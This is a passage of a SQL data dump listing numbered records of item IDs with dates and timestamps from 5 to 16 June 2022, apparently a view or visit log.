22:58:26'),(52735,1594,1,'2022-06-05','2022-06-05 22:58:27'),(52736,1596,1,'2022-06-05','2022-06-05 22:58:31'),(52737,1594,1,'2022-06-05','2022-06-05 22:58:49'),(52738,1596,1,'2022-06-05','2022-06-05 23:44:31'),(52739,4703,1,'2022-06-05','2022-06-05 23:56:35'),(52740,1596,1,'2022-06-06','2022-06-06 00:28:25'),(52741,1596,1,'2022-06-06','2022-06-06 01:13:28'),(52742,4520,1,'2022-06-06','2022-06-06 02:32:56'),(52743,3721,1,'2022-06-06','2022-06-06 03:38:17'),(52744,2248,1,'2022-06-06','2022-06-06 04:23:21'),(52745,3691,1,'2022-06-06','2022-06-06 04:27:32'),(52746,3045,1,'2022-06-06','2022-06-06 04:38:28'),(52747,1745,1,'2022-06-06','2022-06-06 04:38:32'),(52748,3691,1,'2022-06-06','2022-06-06 05:33:00'),(52749,72,1,'2022-06-06','2022-06-06 05:43:38'),(52750,2911,1,'2022-06-06','2022-06-06 05:54:04'),(52751,3691,1,'2022-06-06','2022-06-06 06:17:28'),(52752,2503,1,'2022-06-06','2022-06-06 07:03:01'),(52753,4454,1,'2022-06-06','2022-06-06 07:29:31'),(52754,1582,1,'2022-06-06','2022-06-06 07:40:41'),(52755,91,1,'2022-06-06','2022-06-06 07:43:13'),(52756,1602,1,'2022-06-06','2022-06-06 08:32:56'),(52757,1596,1,'2022-06-06','2022-06-06 09:14:55'),(52758,87,1,'2022-06-06','2022-06-06 10:25:24'),(52759,2152,1,'2022-06-06','2022-06-06 10:26:17'),(52760,2152,1,'2022-06-06','2022-06-06 10:26:21'),(52761,72,1,'2022-06-06','2022-06-06 10:40:55'),(52762,80,1,'2022-06-06','2022-06-06 10:46:07'),(52763,1766,1,'2022-06-06','2022-06-06 11:05:48'),(52764,1766,1,'2022-06-06','2022-06-06 11:06:36'),(52765,1582,1,'2022-06-06','2022-06-06 11:08:52'),(52766,1766,1,'2022-06-06','2022-06-06 11:08:58'),(52767,1588,1,'2022-06-06','2022-06-06 11:25:58'),(52768,4412,1,'2022-06-06','2022-06-06 11:26:05'),(52769,1582,1,'2022-06-06','2022-06-06 11:27:10'),(52770,1606,1,'2022-06-06','2022-06-06 12:17:56'),(52771,72,1,'2022-06-06','2022-06-06 12:55:59'),(52772,472,1,'2022-06-06','2022-06-06 12:56:28'),(52773,1612,1,'2022-06-06','2022-06-06 13:03:15'),(52774,1695,1,'2022-06-06','2022-06-06 13:40:55'),(52775,72,1,'2022-06-06','2022-06-06 13:52:29'),(52776,1766,1,'2022-06-06','2022-06-06 14:20:11'),(52777,87,1,'2022-06-06','2022-06-06 14:26:04'),(52778,3781,1,'2022-06-06','2022-06-06 14:32:59'),(52779,2911,1,'2022-06-06','2022-06-06 14:39:36'),(52780,1582,1,'2022-06-06','2022-06-06 14:48:25'),(52781,87,1,'2022-06-06','2022-06-06 15:10:55'),(52782,2911,1,'2022-06-06','2022-06-06 15:24:05'),(52783,1590,1,'2022-06-06','2022-06-06 17:26:55'),(52784,1596,1,'2022-06-06','2022-06-06 17:53:22'),(52785,4424,1,'2022-06-06','2022-06-06 18:37:57'),(52786,3109,1,'2022-06-06','2022-06-06 19:12:14'),(52787,1588,1,'2022-06-06','2022-06-06 19:39:41'),(52788,3079,1,'2022-06-06','2022-06-06 21:39:03'),(52789,72,1,'2022-06-06','2022-06-06 22:34:47'),(52790,4685,1,'2022-06-06','2022-06-06 23:16:27'),(52791,2410,1,'2022-06-07','2022-06-07 00:53:07'),(52792,3178,1,'2022-06-07','2022-06-07 02:16:28'),(52793,4700,1,'2022-06-07','2022-06-07 02:48:31'),(52794,1596,1,'2022-06-07','2022-06-07 02:53:43'),(52795,1598,1,'2022-06-07','2022-06-07 03:46:41'),(52796,472,1,'2022-06-07','2022-06-07 03:53:03'),(52797,1592,1,'2022-06-07','2022-06-07 04:21:14'),(52798,477,1,'2022-06-07','2022-06-07 04:31:27'),(52799,1772,1,'2022-06-07','2022-06-07 05:09:20'),(52800,1602,1,'2022-06-07','2022-06-07 05:50:06'),(52801,570,1,'2022-06-07','2022-06-07 05:51:20'),(52802,72,1,'2022-06-07','2022-06-07 06:04:06'),(52803,1588,1,'2022-06-07','2022-06-07 06:44:04'),(52804,1596,1,'2022-06-07','2022-06-07 09:58:04'),(52805,4457,1,'2022-06-07','2022-06-07 10:16:47'),(52806,1544,1,'2022-06-07','2022-06-07 10:26:47'),(52807,2154,1,'2022-06-07','2022-06-07 10:44:20'),(52808,1588,1,'2022-06-07','2022-06-07 11:21:48'),(52809,3790,1,'2022-06-07','2022-06-07 11:25:55'),(52810,1596,1,'2022-06-07','2022-06-07 11:47:29'),(52811,84,1,'2022-06-07','2022-06-07 11:59:03'),(52812,4700,1,'2022-06-07','2022-06-07 12:32:24'),(52813,2395,1,'2022-06-07','2022-06-07 12:44:03'),(52814,4412,1,'2022-06-07','2022-06-07 12:58:54'),(52815,2704,1,'2022-06-07','2022-06-07 13:07:46'),(52816,1766,1,'2022-06-07','2022-06-07 13:18:37'),(52817,1598,1,'2022-06-07','2022-06-07 14:20:42'),(52818,72,1,'2022-06-07','2022-06-07 14:33:43'),(52819,3030,1,'2022-06-07','2022-06-07 14:59:02'),(52820,1582,1,'2022-06-07','2022-06-07 15:20:15'),(52821,470,1,'2022-06-07','2022-06-07 15:21:32'),(52822,3287,1,'2022-06-07','2022-06-07 15:44:04'),(52823,1766,1,'2022-06-07','2022-06-07 16:04:55'),(52824,4323,1,'2022-06-07','2022-06-07 16:29:04'),(52825,3498,1,'2022-06-07','2022-06-07 17:14:00'),(52826,1699,1,'2022-06-07','2022-06-07 17:59:07'),(52827,3102,1,'2022-06-07','2022-06-07 18:26:27'),(52828,2154,1,'2022-06-07','2022-06-07 18:44:06'),(52829,1544,1,'2022-06-07','2022-06-07 18:53:10'),(52830,4412,1,'2022-06-07','2022-06-07 20:08:50'),(52831,1732,1,'2022-06-07','2022-06-07 21:46:04'),(52832,1598,1,'2022-06-07','2022-06-07 22:36:23'),(52833,1598,1,'2022-06-07','2022-06-07 23:25:18'),(52834,4587,1,'2022-06-08','2022-06-08 00:31:42'),(52835,1582,1,'2022-06-08','2022-06-08 00:53:48'),(52836,3285,1,'2022-06-08','2022-06-08 05:40:38'),(52837,72,1,'2022-06-08','2022-06-08 05:58:52'),(52838,4420,1,'2022-06-08','2022-06-08 07:06:18'),(52839,1598,1,'2022-06-08','2022-06-08 07:34:57'),(52840,2751,1,'2022-06-08','2022-06-08 09:24:19'),(52841,470,1,'2022-06-08','2022-06-08 09:30:57'),(52842,1586,1,'2022-06-08','2022-06-08 09:48:56'),(52843,2159,1,'2022-06-08','2022-06-08 09:59:29'),(52844,3102,1,'2022-06-08','2022-06-08 10:12:37'),(52845,2309,1,'2022-06-08','2022-06-08 10:20:05'),(52846,68,1,'2022-06-08','2022-06-08 10:45:12'),(52847,68,1,'2022-06-08','2022-06-08 10:48:53'),(52848,68,1,'2022-06-08','2022-06-08 11:05:19'),(52849,1582,1,'2022-06-08','2022-06-08 11:34:54'),(52850,3083,1,'2022-06-08','2022-06-08 11:51:52'),(52851,1586,1,'2022-06-08','2022-06-08 12:12:11'),(52852,1600,1,'2022-06-08','2022-06-08 12:22:57'),(52853,3282,1,'2022-06-08','2022-06-08 12:27:49'),(52854,1614,1,'2022-06-08','2022-06-08 12:30:52'),(52855,1614,1,'2022-06-08','2022-06-08 12:33:09'),(52856,3005,1,'2022-06-08','2022-06-08 13:03:27'),(52857,4400,1,'2022-06-08','2022-06-08 13:06:26'),(52858,4400,1,'2022-06-08','2022-06-08 13:06:29'),(52859,2617,1,'2022-06-08','2022-06-08 13:33:25'),(52860,4668,1,'2022-06-08','2022-06-08 13:39:49'),(52861,1582,1,'2022-06-08','2022-06-08 13:56:32'),(52862,68,1,'2022-06-08','2022-06-08 14:14:34'),(52863,72,1,'2022-06-08','2022-06-08 14:51:01'),(52864,2775,1,'2022-06-08','2022-06-08 15:06:37'),(52865,4674,1,'2022-06-08','2022-06-08 15:09:48'),(52866,1582,1,'2022-06-08','2022-06-08 15:31:54'),(52867,1582,1,'2022-06-08','2022-06-08 15:37:41'),(52868,1598,1,'2022-06-08','2022-06-08 15:48:26'),(52869,1602,1,'2022-06-08','2022-06-08 16:14:38'),(52870,1602,1,'2022-06-08','2022-06-08 16:14:53'),(52871,3738,1,'2022-06-08','2022-06-08 16:33:46'),(52872,87,1,'2022-06-08','2022-06-08 16:35:13'),(52873,4685,1,'2022-06-08','2022-06-08 16:39:11'),(52874,1596,1,'2022-06-08','2022-06-08 17:13:57'),(52875,91,1,'2022-06-08','2022-06-08 17:14:52'),(52876,1582,1,'2022-06-08','2022-06-08 17:38:18'),(52877,1582,1,'2022-06-08','2022-06-08 17:39:09'),(52878,1582,1,'2022-06-08','2022-06-08 17:39:17'),(52879,76,1,'2022-06-08','2022-06-08 17:41:34'),(52880,1544,1,'2022-06-08','2022-06-08 18:15:04'),(52881,1782,1,'2022-06-08','2022-06-08 18:28:14'),(52882,4691,1,'2022-06-08','2022-06-08 18:50:30'),(52883,4709,1,'2022-06-08','2022-06-08 18:56:07'),(52884,4681,1,'2022-06-08','2022-06-08 18:56:36'),(52885,4688,1,'2022-06-08','2022-06-08 18:58:19'),(52886,4709,1,'2022-06-08','2022-06-08 19:25:58'),(52887,4697,1,'2022-06-08','2022-06-08 19:38:01'),(52888,4677,1,'2022-06-08','2022-06-08 19:42:04'),(52889,486,1,'2022-06-08','2022-06-08 19:42:35'),(52890,3790,1,'2022-06-08','2022-06-08 19:44:57'),(52891,4706,1,'2022-06-08','2022-06-08 19:46:11'),(52892,4703,1,'2022-06-08','2022-06-08 19:54:12'),(52893,4700,1,'2022-06-08','2022-06-08 20:24:32'),(52894,1586,1,'2022-06-08','2022-06-08 20:53:00'),(52895,4694,1,'2022-06-08','2022-06-08 21:10:01'),(52896,4712,1,'2022-06-08','2022-06-08 21:15:11'),(52897,1600,1,'2022-06-08','2022-06-08 21:30:42'),(52898,1614,1,'2022-06-08','2022-06-08 22:42:30'),(52899,1610,1,'2022-06-08','2022-06-08 22:48:40'),(52900,467,1,'2022-06-08','2022-06-08 23:23:35'),(52901,72,1,'2022-06-08','2022-06-08 23:52:59'),(52902,1608,1,'2022-06-09','2022-06-09 00:08:56'),(52903,3738,1,'2022-06-09','2022-06-09 00:19:57'),(52904,102,1,'2022-06-09','2022-06-09 02:48:33'),(52905,72,1,'2022-06-09','2022-06-09 07:17:50'),(52906,1600,1,'2022-06-09','2022-06-09 07:47:02'),(52907,3090,1,'2022-06-09','2022-06-09 08:03:34'),(52908,2704,1,'2022-06-09','2022-06-09 09:24:44'),(52909,1877,1,'2022-06-09','2022-06-09 12:14:08'),(52910,3706,1,'2022-06-09','2022-06-09 12:36:09'),(52911,72,1,'2022-06-09','2022-06-09 14:49:12'),(52912,3749,1,'2022-06-09','2022-06-09 16:02:24'),(52913,1544,1,'2022-06-09','2022-06-09 16:07:10'),(52914,1600,1,'2022-06-09','2022-06-09 16:21:18'),(52915,3102,1,'2022-06-09','2022-06-09 16:36:54'),(52916,4428,1,'2022-06-09','2022-06-09 16:46:13'),(52917,1614,1,'2022-06-09','2022-06-09 18:14:21'),(52918,1608,1,'2022-06-09','2022-06-09 18:14:56'),(52919,1586,1,'2022-06-09','2022-06-09 21:08:19'),(52920,72,1,'2022-06-09','2022-06-09 21:37:56'),(52921,1582,1,'2022-06-09','2022-06-09 22:27:17'),(52922,110,1,'2022-06-09','2022-06-09 22:57:07'),(52923,1598,1,'2022-06-09','2022-06-09 23:12:52'),(52924,4642,1,'2022-06-10','2022-06-10 01:11:37'),(52925,1600,1,'2022-06-10','2022-06-10 01:24:23'),(52926,3680,1,'2022-06-10','2022-06-10 02:46:48'),(52927,472,1,'2022-06-10','2022-06-10 02:47:12'),(52928,87,1,'2022-06-10','2022-06-10 03:35:08'),(52929,4542,1,'2022-06-10','2022-06-10 05:22:11'),(52930,1703,1,'2022-06-10','2022-06-10 05:47:56'),(52931,3109,1,'2022-06-10','2022-06-10 05:56:32'),(52932,4566,1,'2022-06-10','2022-06-10 06:16:33'),(52933,4660,1,'2022-06-10','2022-06-10 06:20:33'),(52934,80,1,'2022-06-10','2022-06-10 06:31:59'),(52935,3090,1,'2022-06-10','2022-06-10 08:20:32'),(52936,1594,1,'2022-06-10','2022-06-10 09:12:47'),(52937,1594,1,'2022-06-10','2022-06-10 09:12:48'),(52938,1594,1,'2022-06-10','2022-06-10 09:12:50'),(52939,4457,1,'2022-06-10','2022-06-10 09:44:33'),(52940,1774,1,'2022-06-10','2022-06-10 10:01:48'),(52941,1774,1,'2022-06-10','2022-06-10 10:02:41'),(52942,1774,1,'2022-06-10','2022-06-10 10:18:11'),(52943,108,1,'2022-06-10','2022-06-10 10:48:57'),(52944,1608,1,'2022-06-10','2022-06-10 10:50:23'),(52945,3787,1,'2022-06-10','2022-06-10 11:09:51'),(52946,3664,1,'2022-06-10','2022-06-10 11:43:56'),(52947,2991,1,'2022-06-10','2022-06-10 12:06:29'),(52948,1608,1,'2022-06-10','2022-06-10 12:18:57'),(52949,1584,1,'2022-06-10','2022-06-10 12:20:45'),(52950,72,1,'2022-06-10','2022-06-10 13:04:45'),(52951,1722,1,'2022-06-10','2022-06-10 13:22:52'),(52952,1722,1,'2022-06-10','2022-06-10 13:23:12'),(52953,1722,1,'2022-06-10','2022-06-10 13:23:35'),(52954,80,1,'2022-06-10','2022-06-10 13:26:20'),(52955,4440,1,'2022-06-10','2022-06-10 13:33:02'),(52956,108,1,'2022-06-10','2022-06-10 13:48:55'),(52957,2809,1,'2022-06-10','2022-06-10 13:50:24'),(52958,4416,1,'2022-06-10','2022-06-10 13:51:36'),(52959,3109,1,'2022-06-10','2022-06-10 14:33:46'),(52960,3261,1,'2022-06-10','2022-06-10 15:03:04'),(52961,1586,1,'2022-06-10','2022-06-10 15:21:01'),(52962,335,1,'2022-06-10','2022-06-10 15:34:12'),(52963,2904,1,'2022-06-10','2022-06-10 15:36:26'),(52964,3285,1,'2022-06-10','2022-06-10 16:50:03'),(52965,1602,1,'2022-06-10','2022-06-10 17:10:28'),(52966,108,1,'2022-06-10','2022-06-10 18:27:25'),(52967,3534,1,'2022-06-10','2022-06-10 18:36:10'),(52968,3731,1,'2022-06-10','2022-06-10 19:09:29'),(52969,3731,1,'2022-06-10','2022-06-10 19:50:53'),(52970,4404,1,'2022-06-10','2022-06-10 20:28:56'),(52971,1584,1,'2022-06-10','2022-06-10 20:45:43'),(52972,91,1,'2022-06-10','2022-06-10 20:45:46'),(52973,4709,1,'2022-06-10','2022-06-10 20:46:38'),(52974,91,1,'2022-06-10','2022-06-10 21:16:53'),(52975,72,1,'2022-06-10','2022-06-10 21:24:52'),(52976,4457,1,'2022-06-10','2022-06-10 22:08:09'),(52977,2297,1,'2022-06-10','2022-06-10 22:16:05'),(52978,1718,1,'2022-06-10','2022-06-10 22:33:03'),(52979,108,1,'2022-06-10','2022-06-10 23:42:19'),(52980,2297,1,'2022-06-10','2022-06-10 23:45:43'),(52981,1707,1,'2022-06-10','2022-06-10 23:51:26'),(52982,4627,1,'2022-06-11','2022-06-11 03:04:24'),(52983,2704,1,'2022-06-11','2022-06-11 03:28:50'),(52984,3267,1,'2022-06-11','2022-06-11 03:53:19'),(52985,2395,1,'2022-06-11','2022-06-11 06:12:38'),(52986,3706,1,'2022-06-11','2022-06-11 07:27:59'),(52987,4420,1,'2022-06-11','2022-06-11 08:41:50'),(52988,3764,1,'2022-06-11','2022-06-11 11:02:05'),(52989,1588,1,'2022-06-11','2022-06-11 12:07:25'),(52990,1588,1,'2022-06-11','2022-06-11 12:09:35'),(52991,3764,1,'2022-06-11','2022-06-11 12:28:25'),(52992,72,1,'2022-06-11','2022-06-11 13:36:27'),(52993,2293,1,'2022-06-11','2022-06-11 17:49:15'),(52994,3069,1,'2022-06-11','2022-06-11 18:28:47'),(52995,335,1,'2022-06-11','2022-06-11 19:25:41'),(52996,1604,1,'2022-06-11','2022-06-11 19:58:59'),(52997,1612,1,'2022-06-11','2022-06-11 22:43:21'),(52998,4712,1,'2022-06-11','2022-06-11 23:05:45'),(52999,1722,1,'2022-06-11','2022-06-11 23:43:49'),(53000,1718,1,'2022-06-12','2022-06-12 00:28:49'),(53001,68,1,'2022-06-12','2022-06-12 01:16:25'),(53002,1614,1,'2022-06-12','2022-06-12 01:43:21'),(53003,4420,1,'2022-06-12','2022-06-12 02:06:07'),(53004,1610,1,'2022-06-12','2022-06-12 02:13:02'),(53005,87,1,'2022-06-12','2022-06-12 02:15:41'),(53006,91,1,'2022-06-12','2022-06-12 02:17:08'),(53007,89,1,'2022-06-12','2022-06-12 02:30:36'),(53008,1782,1,'2022-06-12','2022-06-12 02:34:29'),(53009,1594,1,'2022-06-12','2022-06-12 03:04:44'),(53010,72,1,'2022-06-12','2022-06-12 04:08:03'),(53011,1604,1,'2022-06-12','2022-06-12 05:40:02'),(53012,4424,1,'2022-06-12','2022-06-12 06:12:03'),(53013,2769,1,'2022-06-12','2022-06-12 06:16:27'),(53014,476,1,'2022-06-12','2022-06-12 06:40:04'),(53015,1612,1,'2022-06-12','2022-06-12 06:46:20'),(53016,3030,1,'2022-06-12','2022-06-12 07:09:31'),(53017,3316,1,'2022-06-12','2022-06-12 07:46:18'),(53018,4485,1,'2022-06-12','2022-06-12 07:51:50'),(53019,469,1,'2022-06-12','2022-06-12 08:46:17'),(53020,3307,1,'2022-06-12','2022-06-12 09:58:19'),(53021,4654,1,'2022-06-12','2022-06-12 10:16:17'),(53022,1770,1,'2022-06-12','2022-06-12 10:34:21'),(53023,2617,1,'2022-06-12','2022-06-12 11:19:18'),(53024,2419,1,'2022-06-12','2022-06-12 12:24:43'),(53025,72,1,'2022-06-12','2022-06-12 13:15:13'),(53026,4448,1,'2022-06-12','2022-06-12 13:59:03'),(53027,1602,1,'2022-06-12','2022-06-12 14:12:47'),(53028,76,1,'2022-06-12','2022-06-12 14:14:10'),(53029,91,1,'2022-06-12','2022-06-12 14:19:22'),(53030,1602,1,'2022-06-12','2022-06-12 14:49:18'),(53031,1598,1,'2022-06-12','2022-06-12 15:28:13'),(53032,1598,1,'2022-06-12','2022-06-12 15:28:16'),(53033,1598,1,'2022-06-12','2022-06-12 15:30:59'),(53034,1598,1,'2022-06-12','2022-06-12 15:31:29'),(53035,2309,1,'2022-06-12','2022-06-12 16:04:24'),(53036,1770,1,'2022-06-12','2022-06-12 18:42:05'),(53037,4238,1,'2022-06-12','2022-06-12 19:05:35'),(53038,3479,1,'2022-06-12','2022-06-12 19:26:49'),(53039,4681,1,'2022-06-12','2022-06-12 20:11:48'),(53040,1544,1,'2022-06-12','2022-06-12 20:16:54'),(53041,3261,1,'2022-06-12','2022-06-12 21:01:55'),(53042,4412,1,'2022-06-12','2022-06-12 21:11:51'),(53043,472,1,'2022-06-13','2022-06-13 01:41:49'),(53044,1602,1,'2022-06-13','2022-06-13 03:29:24'),(53045,4412,1,'2022-06-13','2022-06-13 05:26:57'),(53046,3096,1,'2022-06-13','2022-06-13 05:57:24'),(53047,3781,1,'2022-06-13','2022-06-13 06:56:48'),(53048,3486,1,'2022-06-13','2022-06-13 08:27:04'),(53049,3706,1,'2022-06-13','2022-06-13 08:54:23'),(53050,3479,1,'2022-06-13','2022-06-13 08:56:49'),(53051,4520,1,'2022-06-13','2022-06-13 09:55:06'),(53052,2769,1,'2022-06-13','2022-06-13 10:30:35'),(53053,4416,1,'2022-06-13','2022-06-13 10:34:58'),(53054,1610,1,'2022-06-13','2022-06-13 11:18:08'),(53055,4448,1,'2022-06-13','2022-06-13 11:23:21'),(53056,4551,1,'2022-06-13','2022-06-13 11:53:32'),(53057,89,1,'2022-06-13','2022-06-13 12:06:30'),(53058,87,1,'2022-06-13','2022-06-13 12:06:45'),(53059,72,1,'2022-06-13','2022-06-13 12:17:46'),(53060,4238,1,'2022-06-13','2022-06-13 12:32:22'),(53061,3313,1,'2022-06-13','2022-06-13 12:37:19'),(53062,3710,1,'2022-06-13','2022-06-13 13:04:38'),(53063,1582,1,'2022-06-13','2022-06-13 13:08:49'),(53064,1582,1,'2022-06-13','2022-06-13 13:09:58'),(53065,1728,1,'2022-06-13','2022-06-13 13:21:18'),(53066,1582,1,'2022-06-13','2022-06-13 13:25:55'),(53067,335,1,'2022-06-13','2022-06-13 13:28:24'),(53068,1582,1,'2022-06-13','2022-06-13 13:28:27'),(53069,1582,1,'2022-06-13','2022-06-13 13:44:17'),(53070,570,1,'2022-06-13','2022-06-13 13:53:05'),(53071,570,1,'2022-06-13','2022-06-13 13:53:51'),(53072,570,1,'2022-06-13','2022-06-13 13:54:07'),(53073,570,1,'2022-06-13','2022-06-13 13:56:48'),(53074,570,1,'2022-06-13','2022-06-13 13:57:02'),(53075,570,1,'2022-06-13','2022-06-13 13:57:23'),(53076,570,1,'2022-06-13','2022-06-13 13:57:50'),(53077,4412,1,'2022-06-13','2022-06-13 13:58:36'),(53078,1724,1,'2022-06-13','2022-06-13 14:25:52'),(53079,1870,1,'2022-06-13','2022-06-13 15:24:42'),(53080,72,1,'2022-06-13','2022-06-13 15:41:46'),(53081,2503,1,'2022-06-13','2022-06-13 15:44:28'),(53082,1544,1,'2022-06-13','2022-06-13 16:09:36'),(53083,87,1,'2022-06-13','2022-06-13 16:17:00'),(53084,1544,1,'2022-06-13','2022-06-13 16:22:37'),(53085,3781,1,'2022-06-13','2022-06-13 16:22:46'),(53086,1594,1,'2022-06-13','2022-06-13 16:48:01'),(53087,68,1,'2022-06-13','2022-06-13 16:49:38'),(53088,74,1,'2022-06-13','2022-06-13 17:20:02'),(53089,2904,1,'2022-06-13','2022-06-13 17:20:12'),(53090,4648,1,'2022-06-13','2022-06-13 17:52:39'),(53091,1598,1,'2022-06-13','2022-06-13 21:13:57'),(53092,91,1,'2022-06-13','2022-06-13 21:21:30'),(53093,1598,1,'2022-06-13','2022-06-13 21:22:13'),(53094,1598,1,'2022-06-13','2022-06-13 21:25:15'),(53095,4436,1,'2022-06-13','2022-06-13 22:16:04'),(53096,4412,1,'2022-06-13','2022-06-13 22:23:53'),(53097,3313,1,'2022-06-13','2022-06-13 22:52:40'),(53098,4651,1,'2022-06-13','2022-06-13 23:22:44'),(53099,1872,1,'2022-06-13','2022-06-13 23:52:43'),(53100,1600,1,'2022-06-14','2022-06-14 00:04:06'),(53101,3781,1,'2022-06-14','2022-06-14 00:23:19'),(53102,72,1,'2022-06-14','2022-06-14 06:35:17'),(53103,2159,1,'2022-06-14','2022-06-14 08:16:54'),(53104,1718,1,'2022-06-14','2022-06-14 08:18:45'),(53105,3781,1,'2022-06-14','2022-06-14 08:33:21'),(53106,2309,1,'2022-06-14','2022-06-14 09:03:01'),(53107,2309,1,'2022-06-14','2022-06-14 09:03:24'),(53108,2309,1,'2022-06-14','2022-06-14 09:03:52'),(53109,2309,1,'2022-06-14','2022-06-14 09:04:29'),(53110,1877,1,'2022-06-14','2022-06-14 09:07:14'),(53111,2309,1,'2022-06-14','2022-06-14 09:30:44'),(53112,87,1,'2022-06-14','2022-06-14 10:08:33'),(53113,3691,1,'2022-06-14','2022-06-14 10:40:10'),(53114,76,1,'2022-06-14','2022-06-14 10:40:32'),(53115,2813,1,'2022-06-14','2022-06-14 10:40:53'),(53116,68,1,'2022-06-14','2022-06-14 10:49:08'),(53117,89,1,'2022-06-14','2022-06-14 10:49:58'),(53118,87,1,'2022-06-14','2022-06-14 10:51:23'),(53119,87,1,'2022-06-14','2022-06-14 10:51:31'),(53120,479,1,'2022-06-14','2022-06-14 10:52:33'),(53121,87,1,'2022-06-14','2022-06-14 10:52:53'),(53122,2904,1,'2022-06-14','2022-06-14 11:44:21'),(53123,2457,1,'2022-06-14','2022-06-14 11:59:28'),(53124,2457,1,'2022-06-14','2022-06-14 12:00:32'),(53125,68,1,'2022-06-14','2022-06-14 12:01:13'),(53126,2457,1,'2022-06-14','2022-06-14 12:02:15'),(53127,3006,1,'2022-06-14','2022-06-14 12:36:38'),(53128,76,1,'2022-06-14','2022-06-14 13:47:43'),(53129,1596,1,'2022-06-14','2022-06-14 13:53:53'),(53130,4448,1,'2022-06-14','2022-06-14 14:17:23'),(53131,4645,1,'2022-06-14','2022-06-14 14:20:38'),(53132,4457,1,'2022-06-14','2022-06-14 14:48:40'),(53133,76,1,'2022-06-14','2022-06-14 14:50:56'),(53134,68,1,'2022-06-14','2022-06-14 14:53:36'),(53135,72,1,'2022-06-14','2022-06-14 15:03:45'),(53136,1602,1,'2022-06-14','2022-06-14 15:09:14'),(53137,4700,1,'2022-06-14','2022-06-14 15:25:05'),(53138,91,1,'2022-06-14','2022-06-14 15:25:28'),(53139,87,1,'2022-06-14','2022-06-14 15:50:13'),(53140,3789,1,'2022-06-14','2022-06-14 17:11:06'),(53141,2159,1,'2022-06-14','2022-06-14 17:37:30'),(53142,3781,1,'2022-06-14','2022-06-14 18:05:38'),(53143,2904,1,'2022-06-14','2022-06-14 18:28:06'),(53144,1602,1,'2022-06-14','2022-06-14 19:20:49'),(53145,68,1,'2022-06-14','2022-06-14 19:21:42'),(53146,1602,1,'2022-06-14','2022-06-14 19:21:47'),(53147,1877,1,'2022-06-14','2022-06-14 19:58:11'),(53148,1594,1,'2022-06-14','2022-06-14 20:28:13'),(53149,3489,1,'2022-06-14','2022-06-14 20:59:03'),(53150,1602,1,'2022-06-14','2022-06-14 21:29:58'),(53151,4428,1,'2022-06-14','2022-06-14 22:52:34'),(53152,1596,1,'2022-06-14','2022-06-14 22:52:37'),(53153,4694,1,'2022-06-14','2022-06-14 22:53:28'),(53154,4694,1,'2022-06-14','2022-06-14 23:02:44'),(53155,1586,1,'2022-06-15','2022-06-15 00:40:24'),(53156,3691,1,'2022-06-15','2022-06-15 01:36:54'),(53157,1594,1,'2022-06-15','2022-06-15 01:51:33'),(53158,80,1,'2022-06-15','2022-06-15 02:07:14'),(53159,80,1,'2022-06-15','2022-06-15 02:08:53'),(53160,87,1,'2022-06-15','2022-06-15 03:38:45'),(53161,2159,1,'2022-06-15','2022-06-15 04:32:39'),(53162,1602,1,'2022-06-15','2022-06-15 05:55:24'),(53163,3781,1,'2022-06-15','2022-06-15 07:26:01'),(53164,1877,1,'2022-06-15','2022-06-15 08:08:50'),(53165,1586,1,'2022-06-15','2022-06-15 08:32:56'),(53166,4301,1,'2022-06-15','2022-06-15 08:57:36'),(53167,1582,1,'2022-06-15','2022-06-15 09:18:00'),(53168,472,1,'2022-06-15','2022-06-15 09:45:41'),(53169,4341,1,'2022-06-15','2022-06-15 09:56:36'),(53170,1598,1,'2022-06-15','2022-06-15 10:18:42'),(53171,1722,1,'2022-06-15','2022-06-15 10:27:31'),(53172,1772,1,'2022-06-15','2022-06-15 12:01:43'),(53173,4663,1,'2022-06-15','2022-06-15 14:28:13'),(53174,72,1,'2022-06-15','2022-06-15 14:34:45'),(53175,1870,1,'2022-06-15','2022-06-15 15:07:47'),(53176,3438,1,'2022-06-15','2022-06-15 15:12:24'),(53177,4635,1,'2022-06-15','2022-06-15 15:38:15'),(53178,4660,1,'2022-06-15','2022-06-15 15:39:37'),(53179,4660,1,'2022-06-15','2022-06-15 15:39:56'),(53180,484,1,'2022-06-15','2022-06-15 15:57:42'),(53181,4432,1,'2022-06-15','2022-06-15 16:58:31'),(53182,4517,1,'2022-06-15','2022-06-15 18:44:24'),(53183,472,1,'2022-06-15','2022-06-15 18:58:20'),(53184,4514,1,'2022-06-15','2022-06-15 19:14:27'),(53185,1586,1,'2022-06-15','2022-06-15 19:42:38'),(53186,4520,1,'2022-06-15','2022-06-15 19:44:33'),(53187,68,1,'2022-06-15','2022-06-15 20:16:21'),(53188,3034,1,'2022-06-15','2022-06-15 20:29:03'),(53189,4420,1,'2022-06-15','2022-06-15 20:49:54'),(53190,4391,1,'2022-06-15','2022-06-15 21:12:33'),(53191,72,1,'2022-06-15','2022-06-15 21:24:00'),(53192,483,1,'2022-06-15','2022-06-15 21:57:28'),(53193,3438,1,'2022-06-15','2022-06-15 22:09:47'),(53194,477,1,'2022-06-15','2022-06-15 22:10:29'),(53195,3030,1,'2022-06-15','2022-06-15 22:44:20'),(53196,1602,1,'2022-06-16','2022-06-16 00:29:13'),(53197,1588,1,'2022-06-16','2022-06-16 01:25:39'),(53198,4529,1,'2022-06-16','2022-06-16 01:35:54'),(53199,4524,1,'2022-06-16','2022-06-16 01:35:57'),(53200,1600,1,'2022-06-16','2022-06-16 02:10:37'),(53201,472,1,'2022-06-16','2022-06-16 02:55:37'),(53202,1586,1,'2022-06-16','2022-06-16 03:41:18'),(53203,2904,1,'2022-06-16','2022-06-16 03:41:28'),(53204,102,1,'2022-06-16','2022-06-16 03:42:02'),(53205,2904,1,'2022-06-16','2022-06-16 03:42:29'),(53206,2904,1,'2022-06-16','2022-06-16 03:44:09'),(53207,1606,1,'2022-06-16','2022-06-16 05:24:47'),(53208,72,1,'2022-06-16','2022-06-16 06:16:36'),(53209,3226,1,'2022-06-16','2022-06-16 06:16:57'),(53210,3764,1,'2022-06-16','2022-06-16 08:49:14'),(53211,1741,1,'2022-06-16','2022-06-16 10:45:35'),(53212,1741,1,'2022-06-16','2022-06-16 10:46:12'),(53213,1741,1,'2022-06-16','2022-06-16 10:46:26'),(53214,4436,1,'2022-06-16','2022-06-16 10:55:37'),(53215,1582,1,'2022-06-16','2022-06-16 11:01:59'),(53216,4703,1,'2022-06-16','2022-06-16 11:15:10'),(53217,1602,1,'2022-06-16','2022-06-16 11:44:37'),(53218,3282,1,'2022-06-16','2022-06-16 11:45:46'),(53219,4498,1,'2022-06-16','2022-06-16 12:04:06'),(53220,4657,1,'2022-06-16','2022-06-16 12:13:48'),(53221,2154,1,'2022-06-16','2022-06-16 